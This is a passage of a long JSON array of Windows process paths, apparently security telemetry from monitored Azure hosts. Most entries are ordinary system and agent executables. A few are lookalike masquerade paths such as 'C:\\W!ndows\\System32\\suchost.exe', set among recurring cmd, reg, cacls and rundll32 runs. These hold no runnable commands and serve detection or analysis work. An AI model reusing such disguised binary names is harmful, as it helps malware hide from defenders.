2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\W!ndows\\\\System32\\\\suchost.exe\",\"C:\\\\W!ndows\\\\System32\\\\powershell.exe\",\"C:\\\\W!ndows\\\\System32\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\Speech_OneCore\\\\Common\\\\SpeechModelDownload.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\AppHostRegistrationVerifier.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\